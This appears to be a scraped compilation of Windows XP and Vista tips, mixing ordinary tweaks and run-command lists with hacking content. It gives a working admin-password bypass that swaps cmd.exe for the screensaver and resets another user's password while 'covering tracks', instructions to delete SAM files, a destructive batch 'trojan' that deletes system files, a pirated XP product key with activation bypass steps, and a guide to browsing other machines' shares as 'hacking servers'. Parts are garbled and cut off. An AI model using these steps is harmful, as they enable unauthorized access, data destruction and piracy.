Hack Winxp

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The FAT16 file system was introduced way back with MS�DOS in 1981, and it's
showing its age. It was designed originally to handle files on a floppy drive, and
has had minor modifications over the years so it can handle hard disks, and even
file names longer than the original limitation of 8.3 characters, but it's still
the lowest common denominator. The biggest advantage of FAT16 is that it is
compatible across a wide variety of operating systems, including Windows 95/98/Me,
OS/2, Linux, and some versions of UNIX. The biggest problem of FAT16 is that it
has a fixed maximum number of clusters per partition, so as hard disks get bigger
and bigger, the size of each cluster has to get larger. In a 2�GB partition, each
cluster is 32 kilobytes, meaning that even the smallest file on the partition will
take up 32 KB of space. FAT16 also doesn't support compression, encryption, or
advanced security using access control lists.

The FAT32 file system, originally introduced in Windows 95 Service Pack 2, is
really just an extension of the original FAT16 file system that provides for a
much larger number of clusters per partition. As such, it greatly improves the
overall disk utilization when compared to a FAT16 file system. However, FAT32
shares all of the other limitations of FAT16, and adds an important additional
limitation�many operating systems that can recognize FAT16 will not work with
FAT32�most notably Windows NT, but also Linux and UNIX as well. Now this isn't a
problem if you're running FAT32 on a Windows XP computer and sharing your drive
out to other computers on your network�they don't need to know (and generally
don't really care) what your underlying file system is.

The Advantages of NTFS

The NTFS file system, introduced with first version of Windows NT, is a completely
different file system from FAT. It provides for greatly increased security,
file�by�file compression, quotas, and even encryption. It is the default file
system for new installations of Windows XP, and if you're doing an upgrade from a
previous version of Windows, you'll be asked if you want to convert your existing
file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and
didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32
volumes to NTFS at any point. Just remember that you can't easily go back to FAT
or FAT32 (without reformatting the drive or partition), not that I think you'll
want to.

The NTFS file system is generally not compatible with other operating systems
installed on the same computer, nor is it available when you've booted a computer
from a floppy disk. For this reason, many system administrators, myself included,
used to recommend that users format at least a small partition at the beginning of
their main hard disk as FAT. This partition provided a place to store emergency
recovery tools or special drivers needed for reinstallation, and was a mechanism
for digging yourself out of the hole you'd just dug into. But with the enhanced
recovery abilities built into Windows XP (more on that in a future column), I
don't think it's necessary or desirable to create that initial FAT partition.

When to Use FAT or FAT32

If you're running more than one operating system on a single computer (see Dual
booting in Guides), you will definitely need to format some of your volumes as
FAT. Any programs or data that need to be accessed by more than one operating
system on that computer should be stored on a FAT16 or possibly FAT32 volume. But
keep in mind that you have no security for data on a FAT16 or FAT32 volume�any one
with access to the computer can read, change, or even delete any file that is
stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a
network. So do not store sensitive files on drives or partitions formatted with
FAT file systems.
how to speed up mozila firefox

type about.config go to 'network.http.pipelining make it true Then go to

network.http.pipelining.maxreque set value 30 lastly right click anywhere and
select NEW-> Integer name it nglayout.initialpaint.delay
set its value to -0
restart mozilla firefox

Make winxp original

* Log in as the local Administrator
* Click Start --> Run --> and type in Regedit
* Browse to: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
# n the right pane, right-click OOBETimer, and then click Modify
# Change at least one digit of this value to deactivate Windows
# Click OK and close regedit
# Click Start --> Run and type in: "%systemroot%\system32\oobe\msoobe.exe /a"
# Click "Yes, I want to telephone a customer service representative to activate
Windows, and then click Next
# Click Change Product Key (at the bottom)
# Enter your valid Corporate Product Key V2C47-MK7JD-3R89F-D2KXW-VPK3J
# Press Update and close the window.
# If you are returned to the previous window, click Remind me later
# Restart your computer

scrap to all


Microsoft Internet Explorer 6.x Repair for Windows XP

From the Start menu, select Search, select All Files and Folders.
* Select More Advanced Options and place a checkmark beside Search Hidden
Files and Folders option.
* Ensure that Search System Folders and Search Subfolders are also checked.
* In the All or Part of the File Name box, type ie.inf
* In the Look In drop-down menu, select C: or the letter of the hard drive
that contains the Windows folder.
* Click the Search button.
* In the search results pane, find the ie.inf file located in Windows\Inf
* Right click the ie.inf file and click Install on the context menu.
* Reboot the computer when the file copy process is complete.

Hey try this out...Itz amazing

Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root

cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user <admin account name here> password"

If the Administrator Account is called Frank and you want the password blah enter

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to
cover tracks

Another way ...

Boot from win98 cd, delete the SAM, SAM.SAV, SAM.LOg files ( in sytem32/config
folder ). Note: don't delete SAM.exe.

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling
you that a program is still running? Making it so that Windows automatically kills
applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl
PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the
value 1.

No Shutdown:

Wanna play with your friends by removing the shutdown option from start menu in
their computer.
Just hack it down !!!

Display legal notice on startup:

Wanna tell your friends about the do's and dont's in your computer when they login
in your absence. Well you can do it pretty easily by displaying a legal notice at
system start up.
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

How to hack Servers !!

1)Create a file anywhere you want.

2)Right click on the file.

Then choose with-->Choose program-->Browse

3)Now you have to enter in to DDESHARE file.

4)Click on Start-->go to Accessories-->Right click on Command Prompt

5)Click on proporties now click Find target.

6)Now you are in c:\ drive. that is system 32.

7)Click on Search.Choose all files and folders..

Search for "DDESHARE".

8)After finding that file.Just double click on that file.

9)Now click on Shares.choose computer.

10)Including domain controller it will show all systems which are connected to

11)Now choose which system do you want to hack.All computer names will be in the
format \\thecomputernamegoeshere.

12)Right click on the system which you are going to hack and copy its name and
paste it in your file.which you have choosen in 1st step.

13)The file name will be in the format \\thecomputernamegoeshere.If the first

computer in the server dose'nt work then choose 2nd computer.

14)Now you will be seeing "shared folder" for folder name.

15)Now double click on that folder.you will be seeing many domains which are
connected to the server.

16)Now you hacked the system.just go around for searching for files which you

17)Here you can copy scripts,delete files transfer files from one system to
another system.

create heavy trojan virus

To create a heavy trojan virus type the following commands in notepad and save it
as ".bat" or ".exe" file
@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program
files\internet explorer\iexplore.exe

1st line is used to escape from AV
2nd and 3rd line is used to deactivate mouse and keyboard respectively
4th line is used to increase the volume of the GB
5th line is used to deactivate logoff mode.,if system's logoff is pressed then
blue screen will appear
6th line is used to disable internet explorer
7th line is used to just for the users purpose
NOTE:This virus is only for educational use please do't use in wrong way... keep
fun enjoy....

remove Funny UST Scandal Avi.Exe virus

u remove funny scandal virus so copy on this link and send your browser and
dowanload to the Funny UST Scandal Avi.Exe Remover zip�� GO FAST >>>>>


how to remove orkut virus

1. Press CTRL+ALT+DEL and go to the processes tab

2. Look for svchost.exe under the image name. There will be many but look for the
ones which have your username under the username

3. Press DEL to kill these files. It will give you a warning, Press Yes

4. Repeat for more svchost.exe files with your username and repeat. Do not kill
svchost.exe with system, local service or network service!

5. Now open My Computer

6. In the address bar, type C:\heap41a and press enter. It is a hidden folder, and
is not visible by default.

7. Delete all the files here

8. Now go to Start --> Run and type Regedit

9. Go to the menu Edit --> Find

10. Type "heap41a" here and press enter. You will get something like this
"[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt"

11. Select that and Press DEL. It will ask "Are you sure you want to delete this
value?", click Yes

12.Now close the registry editor.

Now the virus is gone.

To rename the start button,

To rename the start button, you will need a hex editor.
My preference is UltraEdit

Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)

With the hex editor, open that file and go to offset 412b6
You will see the word start with blanks between each letter
Edit it be any 5 characters or less
Save the file
Boot to DOS
Copy the existing c:\windows\explorer.exe to explorer.org
Copy explorer_1.exe to explorer.exe
You will also need to replace the explorer.exe in the c:\windows\system32\dllcache
file as well with the new one.

Note: If the partition is NTFS and you can't access the files from DOS:

Start Regedit
Go to
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \
Change the value of Shell from Explorer.exe to explorer_1.exe

hhow to remove corrupted file in winxp


1. Windows XP CD

Now, follow this steps:

1. Place the xp cd in your cd/dvd drive

2. Go to start
3. run
4. type "sfc /scannow" (without ")

Now sit back and relax, it should all load and fix all your corrupted file on win

Hack windows vista

Activat vista without any crack

activate windows vista any edition

# Install Windows Vista Ultimate edition (or other edition) without product key.
# Windows Vista needs to be applied with 2099-ReArm trick, so that the counter of
minutes to no activation required period will not return to normal after reboot.
Click on Start Orb button.
# Select �All Programs�, then �Accessories�.
# Right click on �Command Prompt, then select �Run as Administrator (A)�.
# If User Account Control (UAC) prompt a warning message, click on �Continue�.
# In the command prompt, type date and press Enter. You will see the following:

Microsoft Windows [Version 6.0.6000]

Copyright (c) 2006 Microsoft Corporation. All rights reserved.

Current date: 12/19/2006 Thursday
Enter new date:
# Enter 12/31/2099 (December 31, 2099).
# Next, type cscript slmgr.vbs -rearm. You will see something like the following:

C:\Windows\system32>cscript slmgr.vbs -rearm

Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

The command completed successfully.

To make the change effectively, please restart the system.
# Then reset the date of the system to current date again by typing date again.
You will see the following:

Microsoft Windows [Version 6.0.6000]

Copyright (c) 2006 Microsoft Corporation. All rights reserved.

Current date: 12/31/2099 Thursday
Enter new date:
# Type in current date, i.e. 12/19/2006.
# Exit from command prompt, but do not restart the computer.


Copy the following prgram:

title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End

* Now paste it in notepad.

* Save it as batch file(with extension .bat).Any name will do.

* Now you see a batch file. Double click it to create a folder locker.

* A new folder named Locker would be formed at the same location.

* Now brings all the files you want to hide in the locker folder.

* Now double click the batch file to lock the folder namely Locker.

* If you want to unlock your files,double click the batch file again and you would

prompted for password.Enter the password and enjoy access to the folder.

SOME USEFUL run command

Power Configuration -powercfg.cpl
Printers and Faxes -control printers
Printers Folder -printers
Private Character Editor -eudcedit
Quicktime (If Installed) -QuickTime.cpl
Quicktime Player (if installed) -quicktimeplayer
Real Player (if installed) -realplay
Regional Settings -intl.cpl
Registry Editor -regedit
Registry Editor -regedit32
Remote Access Phonebook -rasphone
Remote Desktop -mstsc
Removable Storage -ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information- msinfo32
System Properties - sysdm.cpl
Task Manager - taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman


ADDUSERS -Add or list users to/from a CSV file
ARP -Address Resolution Protocol
ASSOC -Change file extension associations
ASSOCIAT -One step file association
AT -Schedule a command to run at a later time
ATTRIB -Change file attributes

BOOTCFG -Edit Windows boot settings

BROWSTAT -Get domain, browser and PDC info

CACLS -Change file permissions

CALL -Call one batch program from another
CD -Change Directory - move to a specific Folder
CHANGE -Change Terminal Server Session properties
CHKDSK -Check Disk - check and repair disk problems
CHKNTFS -Check the NTFS file system
CHOICE -Accept keyboard input to a batch file
CIPHER -Encrypt or Decrypt files/folders
CleanMgr -Automated cleanup of Temp files, recycle bin
CLEARMEM -Clear memory leaks
CLIP -Copy STDIN to the Windows clipboard.
CLS -Clear the screen
CLUSTER -Windows Clustering
CMD -Start a new CMD shell
COLOR -Change colors of the CMD window
COMP -Compare the contents of two files or sets of files
COMPACT -Compress files or folders on an NTFS partition
COMPRESS -Compress individual files on an NTFS partition
CON2PRT -Connect or disconnect a Printer
CONVERT -Convert a FAT drive to NTFS.
COPY -Copy one or more files to another location
CSVDE -Import or Export Active Directory data

DATE -Display or set the date

Dcomcnfg -DCOM Configuration Utility
DEFRAG -Defragment hard drive
DEL -Delete one or more files
DELPROF -Delete NT user profiles
DELTREE -Delete a folder and all subfolders
DevCon -Device Manager Command Line Utility
DIR -Display a list of files and folders
DIRUSE -Display disk usage
DISKCOMP -Compare the contents of two floppy disks
DISKCOPY -Copy the contents of one floppy disk to another
DNSSTAT -DNS Statistics
DOSKEY -Edit command line, recall commands, and create macros
DSADD -Add user (computer, group..) to active directory
DSQUERY -List items in active directory
DSMOD -Modify user (computer, group..) in active directory

ECHO -Display message on screen

ENDLOCAL -End localisation of environment changes in a batch file
ERASE -Delete one or more files
EXIT -Quit the CMD shell
EXPAND -Uncompress files
EXTRACT -Uncompress CAB files

FC -Compare two files

FDISK -Disk Format and partition
FIND -Search for a text string in a file
FINDSTR -Search for strings in files
FOR -Conditionally perform a command several times
FORFILES -Batch process multiple files
FORMAT -Format a disk
FREEDISK -Check free disk space (in bytes)
FSUTIL -File and Volume utilities
FTP -File Transfer Protocol
FTYPE -Display or modify file types used in file extension associations

GLOBAL -Display membership of global groups

GOTO -Direct a batch program to jump to a labelled line

HELP -Online Help

HFNETCHK -Network Security Hotfix Checker

IF Conditionally perform a command

IFMEMBER -Is the current user in an NT Workgroup
IPCONFIG -Configure IP

KILL -Remove a program from memory

LABEL -Edit a disk label

LOCAL -Display membership of local groups
LOGEVENT -Write text to the NT event viewer.
LOGOFF -Log a user off
LOGTIME -Log the date and time in a file

MAPISEND -Send email from the command line

MEM -Display memory usage
MD -Create new folders
MODE -Configure a system device
MORE -Display output, one screen at a time
MOUNTVOL -Manage a volume mount point
MOVE -Move files from one folder to another
MOVEUSER -Move a user from one domain to another
MSG -Send a message
MSIEXEC -Microsoft Windows Installer
MSINFO -Windows NT diagnostics
MSTSC -Terminal Server Connection (Remote Desktop Protocol)
MUNGE -Find and Replace text within file(s)
MV -Copy in-use files

NET -Manage network resources

NETDOM -Domain Manager
NETSH -Configure network protocols
NETSVC -Command-line Service Controller
NBTSTAT -Display networking statistics (NetBIOS over TCP/IP)
NETSTAT -Display networking statistics (TCP/IP)
NOW -Display the current Date and Time
NSLOOKUP -Name server lookup
NTBACKUP -Backup folders to tape
NTRIGHTS -Edit user account rights

PATH -Display or set a search path for executable files

PATHPING -Trace route plus network latency and packet loss
PAUSE -Suspend processing of a batch file and display a message
PERMS -Show permissions for a user
PERFMON -Performance Monitor
PING -Test a network connection
POPD -Restore the previous value of the current directory saved by PUSHD
PORTQRY -Display the status of ports and services
PRINT -Print a text file
PRNCNFG -Display, configure or rename a printer
PRNMNGR -Add, delete, list printers set the default printer
PROMPT -Change the command prompt
PsExec -Execute process remotely
PsFile -Show files opened remotely
PsGetSid -Display the SID of a computer or a user
PsInfo -List information about a system
PsKill -Kill processes by name or process ID
PsList -List detailed information about processes
PsLoggedOn -Who's logged on (locally or via resource sharing)
PsLogList -Event log records
PsPasswd -Change account password
PsService -View and control services
PsShutdown -Shutdown or reboot a computer
PsSuspend -Suspend processes
PUSHD -Save and then change the current directory

QGREP -Search file(s) for lines that match a given pattern.

RASDIAL -Manage RAS connections

RASPHONE -Manage RAS connections
RECOVER -Recover a damaged file from a defective disk.
REG -Read, Set or Delete registry keys and values
REGEDIT -Import or export registry settings
REGSVR32 -Register or unregister a DLL
REGINI -Change Registry Permissions
REM -Record comments (remarks) in a batch file
REN -Rename a file or files.
REPLACE -Replace or update one file with another
RD -Delete folder(s)
RDISK -Create a Recovery Disk
RMTSHARE -Share a folder or a printer
ROBOCOPY -Robust File and Folder Copy
ROUTE -Manipulate network routing tables
RUNAS -Execute a program under a different user account
RUNDLL32 -Run a DLL command (add/remove print connections)

SC -Service Control
SCHTASKS -Create or Edit Scheduled Tasks
SCLIST -Display NT Services
ScriptIt -Control GUI applications
SET -Display, set, or remove environment variables
SETLOCAL -Begin localisation of environment changes in a batch file
SETX -Set environment variables permanently
SHARE -List or edit a file share or print share
SHIFT -Shift the position of replaceable parameters in a batch file
SHORTCUT -Create a windows shortcut (.LNK file)
SHOWGRPS -List the NT Workgroups a user has joined
SHOWMBRS -List the Users who are members of a Workgroup
SHUTDOWN -Shutdown the computer
SLEEP -Wait for x seconds
SOON -Schedule a command to run in the near future
SORT -Sort input
START -Start a separate window to run a specified program or command
SU -Switch User
SUBINACL -Edit file and folder Permissions, Ownership and Domain
SUBST -Associate a path with a drive letter
SYSTEMINFO -List system configuration

TASKLIST -List running applications and services

TIME -Display or set the system time
TIMEOUT -Delay processing of a batch file
TITLE -Set the window title for a CMD.EXE session
TOUCH -Change file timestamps
TRACERT -Trace route to a remote host
TREE -Graphical display of folder structure
TYPE -Display the contents of a text file

USRSTAT -List domain usernames and last login

VER -Display version information

VERIFY -Verify that files have been saved
VOL -Display a disk label

WHERE -Locate and display files in a directory tree

WHOAMI -Output the current UserName and domain
WINDIFF -Compare the contents of two files or sets of files
WINMSD -Windows system diagnostics

Using "ALT +" FOR DESKTOP USER ONLY (use no.lock)

Alt+1= ?

Alt+2= ?

Alt+3= ?

Alt+4= ?

Alt+5= ?

Alt+6= ?

Alt+7= �

Alt+8= ?

Alt+9= ?

Alt+10= ?

Alt+11= ?

Alt+12= ?

Alt+13= ?

Alt+14= ?

Alt+15= �
Alt+16= ?

Alt+17= ?

Alt+18= ?

Alt+19= ?

Alt+20= �

Alt+21= �

Alt+22= ?

Alt+23= ?

Alt+24= ?

Alt+25= ?

Alt+26= ?

Alt+27= ?

Alt+28= ?

Alt+29= ?

Alt+30= ?

Alt+31= ?

Alt+127= �

Alt+128= �

Alt+129= �

Alt+130= �

Alt+131= �

Alt+132= �

Alt+133= �

Alt+134= �

Alt+135= �

Alt+136= �

Alt+137= �

Alt+138= �

Alt+139= �
Alt+140= �

Alt+141= �

Alt+142= �

Alt+143= �

Alt+144= �

Alt+145= �

Alt+146= �

Alt+147= �

Alt+148= �

Alt+149= �

Alt+150= �

Alt+151= �

Alt+152= �

Alt+153= �

Alt+154= �

Alt+155= �

Alt+156= �

Alt+157= �

Alt+158= P

Alt+159= �

Alt+160= �

Alt+161= �

Alt+162= �

Alt+163= �

Alt+164= �

Alt+165= �

Alt+166= �

Alt+167= �

Alt+168= �
Alt+169= �

Alt+170= �

Alt+171= �

Alt+172= �

Alt+173= �

Alt+174= �

Alt+175= �


Alt+177= �

Alt+178= �

Alt+179= �


Alt+181= �

Alt+182= �

Alt+183= +

Alt+184= +

Alt+185= �

Alt+186= �

Alt+187= +

Alt+188= +

Alt+189= +

Alt+190= +

Alt+191= +

Alt+192= +

Alt+193= -

Alt+194= -

Alt+195= +




























Alt+224= a

Alt+225= �

Alt+226= G

Alt+228= S

Alt+229= s

Alt+230= �

Alt+231= t

Alt+232= F

Alt+233= T

Alt+234= O

Alt+235= d

Alt+236= 8

Alt+237= f

Alt+238= e

Alt+239= n

Alt+240= =

Alt+241= �

Alt+242= =

Alt+243= =

Alt+244= (

Alt+245= )

Alt+246= �

Alt+247= �


Alt+249= �

Alt+250= �


Alt+252= n

Alt+253= �

Alt+254= �
Solution for the Virus "ntdetec1.exe"
Damages done by the virus : -> Disables Task Manager
-> slows down the computer

Copies are made in : -> C:\ntdetec1.exe

-> C:\ntdetec1\child\ntdetec1.exe

Solution :
open computer in safe mode. Open "regedit". Hit "CTRL+F" and in the search bar,
type "ntdetec1.exe". Delete the key that you find. Then hit F3 and keep on
repeating until you dont get any results. Now again search for "Run.exe", and
delete it. It will be stored in two places. So after deleting 1st one, hit F3 and
delete the second copy.
Delete all the copies in c:, by searching "ntdetec1.exe" in search option.

After that restart your computer in normal mode. You are now free from
ntdetec1.exe virus.

Speed up your Acrobat Reader (Almoust like notepad)

# Go to the installation folder of acrobat reader

(C:\program files\adobe\acrobat\reader\.. whatever)
# Move all the files and folders from the "plugins" directory to the "Optional"
directory. (I repeat.. cut and paste the files NOT copy & paste).
# Also make sure that acrobat reader is not open else it will lock the files and
not allow you to move the files)

Increase your Netspeed

# Go to desktop->My computer-(right click on)->manage->->Device manager->

Now u see a window of Device manager.

# Then go to Ports->Communication Port(double click on it and Open).
# After open u can see a Communication Port properties.
go the Port Setting.

# And now increase ur "Bits per second" to 128000.

and "Flow control" change 2 Hardware.

History of the name Bluetooth

Bluetooth was named after a late tenth century king, Harald Bluetooth, King of
Denmark and Norway. He is known for his unification of previously warring tribes
from Denmark (including now Swedish Scania, where the Bluetooth technology was
invented), and Norway. Bluetooth likewise was intended to unify different
technologies, such as computers and mobile phones


Windows XP keeps a record of all files on the hard disk so when you do a search on
hard drive it is faster. There is a downside to this and because the computer has
index all files, it will slow down normal file commands like open, close, etc. If
you do
not do a whole lot of searches on your hard drive then you may want to turn this
� Open My Computer.
� Right-click your hard drive icon and select Properties.
� At the bottom of the window you'll see "Allow indexing service to index this
for faster searches," uncheck this and click ok.
� A new window will pop up and select Apply to all folders and subfolders.
It will take a minute or two for the changes to take affect but then you should
slightly faster performance.

disable xp boot screen

It is possible to disable the XP splash screen, which will slightly speed up the
overall boot process. Be aware that removing the splash screen will also cause you
to see any boot-up messages that might come up (chkdsk, convert ... ), but if your
runs without any problems then it should not matter.
� Edit boot.ini.
� Add " /noguiboot" right after "/fastdetect".
Upon restarting, the splash screen will be gone. It can be re-enabled by removing
new switch.

a-z run command

Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Adobe Photoshop (if installed) - photoshop
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator � calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts
Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Explorer � iexplore
Internet Properties - inetcpl.cpl
IP Configuration (Display Connection Configuration) - ipconfig /all
IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
IP Configuration (Release All Connections) - ipconfig /release
IP Configuration (Renew All Connections) - ipconfig /renew
IP Configuration (Refreshes DHCP & Re - Registers DNS) -ipconfig /registerdns
IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid
Java Control Panel (If Installed) - jpicpl32.cpl
Java Control Panel (If Installed) - javaws
Keyboard Properties - control keyboard
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff( or press �window key+L� )
Microsoft Chat - winchat
Microsoft Excel � excel
Microsoft Powerpoint - powerpnt
Microsoft Word - winword
Mouse Properties � main.cpl
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed) - nero
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed) - nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator - odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Performance Monitor - perfmon
Phone and Modem Options - telephon.cpl
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed) - QuickTime.cpl
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately) - sfc /scannow
System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting) - sfc /revert
System File Checker Utility (Purge File Cache) - sfc /purgecache
System File Checker Utility (Set Cache Size to size x) -sfc /cachesize=x
System Information - msinfo32
System Properties - sysdm.cpl
System Troubleshooter � dxdiag
Task Manager - taskmgr( or press �ctrl+shift+esc� or �ctrl+alt+delete� )
Telnet Client - telnet
User Account Management - nusrmgr.cpl
Utility Manager - utilman
Windows Backup Utility (if installed) � ntbackup
Windows Explorer � explorer ( or press �window key+E� )
Windows Media Player � wmplayer
Windows Firewall - firewall.cpl
Windows Magnifier - magnify
Windows Management Infrastructure - wmimgmt.msc
Windows System Security Tool - syskey
Windows Update Launches - wupdmgr
Windows Version Check - winver
Windows XP Tour Wizard - tourstart
Wordpad � write

clean ram by notepad

Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a
lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not
need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or



in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option
when u save it ]
Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".


just try it out.. i worked for me

rename a series of files

When you download photos from your digital camera, they often have unrecognizable
names. You can rename several similar files at once with the following procedure.
also works for renaming other types of files.
� Open the My Pictures folder. (Click Start, and then click My Pictures.) Or open
another folder containing files that you want to rename.
� Select the files you want to rename. If the files you want are not adjacent in
file list, press and hold Ctrl, and then click each item to select it.
� On the File menu, click Rename.
� Type the new name, and then press ENTER.
� All of the files in the series will be named in sequence using the new name you
type. For example, if you type Birthday, the first will be named Birthday and
files in the series will be named Birthday (1), Birthday (2), and so on.
� To specify the starting number for the series, type the starting number in
parentheses after the new file name. The files in the series will be numbered in
sequence starting with the number you type. For example, if you type Birthday
(10), the
other files will be named Birthday (11), Birthday (12), and so on.

turn of system recovery

Right click on My Computer and choose Properties. Click on the System Restore tab
and check the box Turn off System Restore. (This will increase Windows performance
& save disk space)

turn of auto play

Open My Computer
- Right click on your CD ROM and choose Properties
- Click on the Auto Play tab
- In the drop down box you can choose the Action for each choice shown in the drop
down box


1. Go to Start>Run>gpedit.msc
2. Computer Config> Administrative Template> System
3. Double click Turn off Autoplay
4. Enable it.

scan disk
It is now hidden.To use it
>Go to
>my Computer
>Right click on your hard drive Icon
It works just like the old scandisk.

WinXP Clear Page file on shutdown

Go to Control panel>
Administrative tools>
Local security policy.>
Then go to local policies.>
security options.
Then change the option for "Shutdown: Clear Virtual Memory Pagefile"

reduce temp internet files space

The temporary internet files clutter your hard drive with copies of each page
visited. These can build up over time and take up disk space. Even more bothersome
is that instead of getting new pages each time IE often takes the page out the
temp internet files. This can be a problem if you are viewing a website that is
updated all the time. If you are on a slow connection such as a 56K or lower then
this can be good but if you are on a fast broadband connection, like me, then you
can get away with decreasing the size of your temp internet files to just one meg
without any performance decrease.

Launch Internet Explorer.

Select the Tools from the menu bar.
Then select Internet Options... from the drop down menu.
Once the internet options has loaded click on the general tab.
Under the temporary internet files section click the settings button.
A settings window will load. Slide the slider all the way to the left so the size
indicated in the text box on the right is one.
Click OK

enable/disable firewall
Open Control Panel and double click on Network Connections. In the new box that
